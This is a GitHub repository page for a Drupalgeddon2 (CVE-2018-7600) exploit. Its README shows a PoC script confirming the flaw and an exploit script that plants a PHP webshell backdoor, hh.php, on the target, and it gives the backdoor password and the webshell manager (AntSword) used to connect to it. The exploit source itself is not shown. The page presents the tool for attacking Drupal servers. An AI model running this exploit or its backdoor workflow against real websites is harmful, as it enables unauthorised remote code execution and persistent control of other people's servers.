Skip to content

killeveee/CVE-2018-7600

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
Exp.py
Exp.py
 
 
PoC.py
PoC.py
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2018-7600

CVE-2018-7600 漏洞验证和利用 Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution

PS D:\CVE-2018-7600> python .\PoC.py
Input target URL (example: http://example.com/): http://192.168.4.5:8080/

Exploitable!
Check: http://192.168.4.5:8080/hh.txt

PS D:\CVE-2018-7600> python .\Exp.py
Input target URL (example: http://example.com/): http://192.168.4.5:8080/

The attack was successful!
Check backdoor: http://192.168.4.5:8080/hh.php
Backdoor key: c

exp利用成功后,会生成后门文件hh.php,可利用WebShell管理工具(如:蚁剑)进行后门连接,类型为php,密码是c

About

CVE-2018-7600 漏洞验证和利用

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages